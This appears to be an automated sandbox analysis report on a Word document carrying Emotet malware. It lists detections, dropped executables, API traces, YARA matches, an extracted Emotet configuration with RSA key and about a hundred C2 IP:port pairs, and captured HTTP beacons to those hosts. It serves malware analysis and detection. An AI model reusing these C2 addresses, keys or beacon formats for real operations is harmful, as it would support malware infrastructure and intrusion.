Analysis Report sample1.bin

Overview

General Information

Sample Name:	sample1.bin (renamed file extension from bin to doc)
Analysis ID:	425356
MD5:	7dbd8ecfada1d39a81a58c9468b91039
SHA1:	0d21e2742204d1f98f6fcabe0544570fd6857dd3
SHA256:	dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

C2 URLs / IPs found in malware configuration

Creates and opens a fake document (probably a fake document to hide exploiting)

Creates processes via WMI

Document contains an embedded VBA macro with suspicious strings

Drops PE files to the user root directory

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to delete services

Contains functionality to enumerate running services

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: sample1.doc

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Ksh1.pdf

Avira: detection malicious, Label: TR/Casdet.xqfgu

Found malware configuration

Source: 10.2.mmcshext.exe.688500.3.raw.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB", "C2 list": ["177.130.51.198:80", "91.121.87.90:8080", "104.131.144.215:8080", "188.226.165.170:8080", "2.58.16.86:8080", "79.133.6.236:8080", "125.200.20.233:80", "109.206.139.119:80", "188.40.170.197:80", "121.117.147.153:443", "221.147.142.214:80", "88.247.58.26:80", "37.205.9.252:7080", "213.165.178.214:80", "27.83.209.210:443", "24.231.51.190:80", "192.210.217.94:8080", "123.216.134.52:80", "179.5.118.12:80", "103.80.51.61:8080", "172.96.190.154:8080", "223.17.215.76:80", "46.105.131.68:8080", "116.91.240.96:80", "118.243.83.70:80", "190.117.101.56:80", "103.229.73.17:8080", "5.79.70.250:8080", "172.105.78.244:8080", "95.76.142.243:80", "113.193.239.51:443", "113.161.148.81:80", "180.148.4.130:8080", "172.193.79.237:80", "42.200.96.63:80", "110.37.224.243:80", "212.198.71.39:80", "185.80.172.199:80", "153.229.219.1:443", "162.144.145.58:8080", "190.55.186.229:80", "94.212.52.40:80", "37.46.129.215:8080", "82.78.179.117:443", "58.27.215.3:8080", "178.33.167.120:8080", "190.164.135.81:80", "73.100.19.104:80", "157.7.164.178:8081", "115.79.59.157:80", "190.194.12.132:80", "85.75.49.113:80", "185.142.236.163:443", "113.203.238.130:80", "91.75.75.46:80", "41.185.29.128:8080", "185.208.226.142:8080", "188.166.220.180:7080", "109.13.179.195:80", "91.83.93.103:443", "190.151.5.131:443", "203.153.216.178:7080", "51.38.50.144:8080", "36.91.44.183:80", "78.186.65.230:80", "180.23.53.200:80", "73.55.128.120:80", "75.127.14.170:8080", "119.92.77.17:80", "192.241.220.183:8080", "120.51.34.254:80", "202.29.237.113:8080", "41.76.213.144:8080", "195.201.56.70:8080", "175.103.38.146:80", "190.192.39.136:80", "203.56.191.129:8080", "180.21.3.52:80", "50.116.78.109:8080", "47.154.85.229:80", "54.38.143.245:8080", "43.255.175.197:80", "60.125.114.64:443", "8.4.9.137:8080", "91.213.106.100:8080", "116.202.10.123:8080", "103.93.220.182:80", "115.79.195.246:80", "139.59.61.215:443", "45.239.204.100:80", "143.95.101.72:8080", "198.20.228.9:8080", "192.163.221.191:8080", "139.59.12.63:8080", "77.74.78.80:443", "118.33.121.37:80", "126.126.139.26:443", "46.32.229.152:8080", "74.208.173.91:8080", "190.85.46.52:7080", "37.187.100.220:7080"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Ksh1.pdf	Metadefender: Detection: 40%			Perma Link
Source: C:\Users\Public\Ksh1.pdf	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: sample1.doc	Virustotal: Detection: 57%	Perma Link
Source: sample1.doc	Metadefender: Detection: 45%	Perma Link
Source: sample1.doc	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Users\Public\Ksh1.pdf

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: sample1.doc

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 14.1.TSChannel.exe.39a0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.dhcpcmonitor.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 14.0.TSChannel.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 10.0.mmcshext.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 8.0.tmp_e473b4.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 10.1.mmcshext.exe.3980000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.1.dhcpcmonitor.exe.39e0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.0.adsmsext.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 11.1.ir50_qcx.exe.3980000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.1.normaliz.exe.3a10000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.0.qdvd.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 9.0.normaliz.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 11.0.ir50_qcx.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 8.1.tmp_e473b4.exe.39b0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.1.adsmsext.exe.2ca0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.1.TSChannel.exe.39a0000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.0.msvcp120_clr0400.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004725E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,	16_2_004725E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00472230 CryptEncrypt,memcpy,CryptGetHashParam,CryptDestroyHash,CryptDuplicateHash,CryptExportKey,GetProcessHeap,RtlAllocateHeap,	16_2_00472230
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00471FC0 CryptDestroyHash,CryptDuplicateHash,memcpy,	16_2_00471FC0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00471FD8 CryptDestroyHash,	16_2_00471FD8

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006438F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	8_2_006438F0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	9_2_003F38F0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	10_2_003F38F0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003338F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	11_2_003338F0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	12_2_004F38F0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002938F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	13_2_002938F0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	14_2_01C638F0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	15_2_003F38F0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004738F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	16_2_004738F0

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Code function: 4x nop then push ebp

8_2_0041FA20

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 177.130.51.198:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 177.130.51.198:80
Source: Malware configuration extractor	IPs: 91.121.87.90:8080
Source: Malware configuration extractor	IPs: 104.131.144.215:8080
Source: Malware configuration extractor	IPs: 188.226.165.170:8080
Source: Malware configuration extractor	IPs: 2.58.16.86:8080
Source: Malware configuration extractor	IPs: 79.133.6.236:8080
Source: Malware configuration extractor	IPs: 125.200.20.233:80
Source: Malware configuration extractor	IPs: 109.206.139.119:80
Source: Malware configuration extractor	IPs: 188.40.170.197:80
Source: Malware configuration extractor	IPs: 121.117.147.153:443
Source: Malware configuration extractor	IPs: 221.147.142.214:80
Source: Malware configuration extractor	IPs: 88.247.58.26:80
Source: Malware configuration extractor	IPs: 37.205.9.252:7080
Source: Malware configuration extractor	IPs: 213.165.178.214:80
Source: Malware configuration extractor	IPs: 27.83.209.210:443
Source: Malware configuration extractor	IPs: 24.231.51.190:80
Source: Malware configuration extractor	IPs: 192.210.217.94:8080
Source: Malware configuration extractor	IPs: 123.216.134.52:80
Source: Malware configuration extractor	IPs: 179.5.118.12:80
Source: Malware configuration extractor	IPs: 103.80.51.61:8080
Source: Malware configuration extractor	IPs: 172.96.190.154:8080
Source: Malware configuration extractor	IPs: 223.17.215.76:80
Source: Malware configuration extractor	IPs: 46.105.131.68:8080
Source: Malware configuration extractor	IPs: 116.91.240.96:80
Source: Malware configuration extractor	IPs: 118.243.83.70:80
Source: Malware configuration extractor	IPs: 190.117.101.56:80
Source: Malware configuration extractor	IPs: 103.229.73.17:8080
Source: Malware configuration extractor	IPs: 5.79.70.250:8080
Source: Malware configuration extractor	IPs: 172.105.78.244:8080
Source: Malware configuration extractor	IPs: 95.76.142.243:80
Source: Malware configuration extractor	IPs: 113.193.239.51:443
Source: Malware configuration extractor	IPs: 113.161.148.81:80
Source: Malware configuration extractor	IPs: 180.148.4.130:8080
Source: Malware configuration extractor	IPs: 172.193.79.237:80
Source: Malware configuration extractor	IPs: 42.200.96.63:80
Source: Malware configuration extractor	IPs: 110.37.224.243:80
Source: Malware configuration extractor	IPs: 212.198.71.39:80
Source: Malware configuration extractor	IPs: 185.80.172.199:80
Source: Malware configuration extractor	IPs: 153.229.219.1:443
Source: Malware configuration extractor	IPs: 162.144.145.58:8080
Source: Malware configuration extractor	IPs: 190.55.186.229:80
Source: Malware configuration extractor	IPs: 94.212.52.40:80
Source: Malware configuration extractor	IPs: 37.46.129.215:8080
Source: Malware configuration extractor	IPs: 82.78.179.117:443
Source: Malware configuration extractor	IPs: 58.27.215.3:8080
Source: Malware configuration extractor	IPs: 178.33.167.120:8080
Source: Malware configuration extractor	IPs: 190.164.135.81:80
Source: Malware configuration extractor	IPs: 73.100.19.104:80
Source: Malware configuration extractor	IPs: 157.7.164.178:8081
Source: Malware configuration extractor	IPs: 115.79.59.157:80
Source: Malware configuration extractor	IPs: 190.194.12.132:80
Source: Malware configuration extractor	IPs: 85.75.49.113:80
Source: Malware configuration extractor	IPs: 185.142.236.163:443
Source: Malware configuration extractor	IPs: 113.203.238.130:80
Source: Malware configuration extractor	IPs: 91.75.75.46:80
Source: Malware configuration extractor	IPs: 41.185.29.128:8080
Source: Malware configuration extractor	IPs: 185.208.226.142:8080
Source: Malware configuration extractor	IPs: 188.166.220.180:7080
Source: Malware configuration extractor	IPs: 109.13.179.195:80
Source: Malware configuration extractor	IPs: 91.83.93.103:443
Source: Malware configuration extractor	IPs: 190.151.5.131:443
Source: Malware configuration extractor	IPs: 203.153.216.178:7080
Source: Malware configuration extractor	IPs: 51.38.50.144:8080
Source: Malware configuration extractor	IPs: 36.91.44.183:80
Source: Malware configuration extractor	IPs: 78.186.65.230:80
Source: Malware configuration extractor	IPs: 180.23.53.200:80
Source: Malware configuration extractor	IPs: 73.55.128.120:80
Source: Malware configuration extractor	IPs: 75.127.14.170:8080
Source: Malware configuration extractor	IPs: 119.92.77.17:80
Source: Malware configuration extractor	IPs: 192.241.220.183:8080
Source: Malware configuration extractor	IPs: 120.51.34.254:80
Source: Malware configuration extractor	IPs: 202.29.237.113:8080
Source: Malware configuration extractor	IPs: 41.76.213.144:8080
Source: Malware configuration extractor	IPs: 195.201.56.70:8080
Source: Malware configuration extractor	IPs: 175.103.38.146:80
Source: Malware configuration extractor	IPs: 190.192.39.136:80
Source: Malware configuration extractor	IPs: 203.56.191.129:8080
Source: Malware configuration extractor	IPs: 180.21.3.52:80
Source: Malware configuration extractor	IPs: 50.116.78.109:8080
Source: Malware configuration extractor	IPs: 47.154.85.229:80
Source: Malware configuration extractor	IPs: 54.38.143.245:8080
Source: Malware configuration extractor	IPs: 43.255.175.197:80
Source: Malware configuration extractor	IPs: 60.125.114.64:443
Source: Malware configuration extractor	IPs: 8.4.9.137:8080
Source: Malware configuration extractor	IPs: 91.213.106.100:8080
Source: Malware configuration extractor	IPs: 116.202.10.123:8080
Source: Malware configuration extractor	IPs: 103.93.220.182:80
Source: Malware configuration extractor	IPs: 115.79.195.246:80
Source: Malware configuration extractor	IPs: 139.59.61.215:443
Source: Malware configuration extractor	IPs: 45.239.204.100:80
Source: Malware configuration extractor	IPs: 143.95.101.72:8080
Source: Malware configuration extractor	IPs: 198.20.228.9:8080
Source: Malware configuration extractor	IPs: 192.163.221.191:8080
Source: Malware configuration extractor	IPs: 139.59.12.63:8080
Source: Malware configuration extractor	IPs: 77.74.78.80:443
Source: Malware configuration extractor	IPs: 118.33.121.37:80
Source: Malware configuration extractor	IPs: 126.126.139.26:443
Source: Malware configuration extractor	IPs: 46.32.229.152:8080
Source: Malware configuration extractor	IPs: 74.208.173.91:8080
Source: Malware configuration extractor	IPs: 190.85.46.52:7080
Source: Malware configuration extractor	IPs: 37.187.100.220:7080

Connects to several IPs in different countries

Source: unknown

Network traffic detected: IP country count 38

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 91.121.87.90:8080

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.131.144.215 104.131.144.215
Source: Joe Sandbox View	IP Address: 143.95.101.72 143.95.101.72

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View	ASN Name: SURF-IDPTSurfindoNetworkID SURF-IDPTSurfindoNetworkID

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.130.51.198/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------fZX6grGG67bSvix2bq9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 177.130.51.198Content-Length: 4452Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /KFDwQljVkxD3/OOFcmzcP5LKdqC/7kx60YXntHFlDt/5Rmtlx5Mir4E2nTGMFj/vs6RDbQfHrygTYrI/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.87.90/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------F6CkwVxliFrUl7piUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.121.87.90:8080Content-Length: 4452Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52B8A12-B174-499E-B3BD-E7523F18DF93}.tmp

Jump to behavior

Source: unknown

HTTP traffic detected: POST /43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.130.51.198/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------fZX6grGG67bSvix2bq9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 177.130.51.198Content-Length: 4452Cache-Control: no-cache

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 26 May 2021 22:19:07 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: certutil.exe, 00000002.00000002.2219887563.0000000002130000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2257462460.0000000002E50000.00000002.00000001.sdmp, normaliz.exe, 00000009.00000002.2261625461.0000000003050000.00000002.00000001.sdmp, mmcshext.exe, 0000000A.00000002.2265977899.0000000002E80000.00000002.00000001.sdmp, ir50_qcx.exe, 0000000B.00000002.2270198814.0000000002EF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: certutil.exe, 00000002.00000002.2219887563.0000000002130000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2257462460.0000000002E50000.00000002.00000001.sdmp, normaliz.exe, 00000009.00000002.2261625461.0000000003050000.00000002.00000001.sdmp, mmcshext.exe, 0000000A.00000002.2265977899.0000000002E80000.00000002.00000001.sdmp, ir50_qcx.exe, 0000000B.00000002.2270198814.0000000002EF0000.00000002.00000001.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2274808207.0000000002F70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: certutil.exe, 00000002.00000002.2220502859.0000000002600000.00000004.00000001.sdmp	String found in binary or memory: https://pornthash.mobi/videos/tayna_tung
Source: certutil.exe, 00000002.00000002.2220502859.0000000002600000.00000004.00000001.sdmp	String found in binary or memory: https://pornthash.mobi/videos/tayna_tung%temp%/tmp_e473b4.exex

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000003.2260910791.0000000000688000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2274679265.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269436388.0000000000331000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289663022.00000000005B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2274011391.00000000004F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2260946472.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330396700.00000000002B4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278477954.0000000000574000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330617776.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265106835.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2289619290.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269524139.0000000000504000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2265408389.0000000000548000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2273841914.00000000002F6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265371977.0000000000686000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2279155029.00000000002B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255546226.0000000000641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2284287661.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2282904583.0000000000274000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2286207050.0000000001C61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2256075266.0000000000658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255733615.0000000000926000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278304115.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2269934201.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2261089149.0000000000614000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289418364.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2251551044.0000000000928000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.640000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.1c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.unpack, type: UNPACKEDPE
